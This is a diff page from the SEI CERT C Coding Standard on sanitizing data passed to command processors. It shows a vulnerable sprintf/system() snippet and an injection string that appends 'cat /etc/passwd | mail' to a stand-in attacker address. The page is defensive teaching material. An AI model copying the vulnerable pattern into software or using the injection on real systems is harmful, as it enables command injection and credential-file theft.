SEI CERT C Coding Standard

Space shortcuts

Page tree

Versions Compared

Old Version 94

changes.mady.by.user Carol J. Lallier

Saved on

compared with

New Version 95

changes.mady.by.user Carol J. Lallier

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
bgColor#FFCCCC
langc
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);

The risk is, of course, is that the user enters the following string as an email address:

Code Block
bogus@addr.com; cat /etc/passwd  | mail some@badguy.net

For more info information on the system() call, see ENV03-C. Sanitize the environment when invoking external programs and ENV04-C. Do not call system() if you do not need a command processor.

...

It is necessary to ensure that all valid data is accepted, while potentially dangerous data is rejected or sanitized. Doing so can be difficult when valid characters or sequences of characters also have special meaning to the subsystem and may involve validating the data against a grammar. In cases where there is no overlap, whitelisting can be used to eliminate dangerous characters from the data.

...

The following compliant solution inserts the "--" (double dash) argument before the call to getenv("USER") in the call to execl():

...

Because the login program uses the POSIX getopt() function to parse command-line arguments, and because the "--" (double dash) option causes getopt() to stop interpreting options in the argument list, the USER variable cannot be used by an attacker to inject an additional command-line option. This is a valid means of sanitizing the untrusted user data in this context because the behavior of the interpretation of the resulting string is rendered innocuous.

...

Tool

Version

Checker

Description

Coverity6.5TAINTED_STRINGFully Implemented

Fortify SCA

5.0

 

 

Klocwork

Include Page
Klocwork_V
Klocwork_V

NNTS.TAINTED SV.TAINTED.INJECTION

 

...

CERT C++ Secure Coding StandardSTR02-CPP. Sanitize data passed to complex subsystems
CERT Oracle Secure Coding Standard for JavaIDS00-J. Sanitize untrusted data passed across a trust boundary
MITRE CWECWE-88, Argument injection or modification
CWE-78, Failure to sanitize data into an OS command (aka "OS command injection")

Bibliography

[ISO/IEC 9899:2011]Section Subclause 7.22.4.8, "The System Function"
[Viega 2003] 

...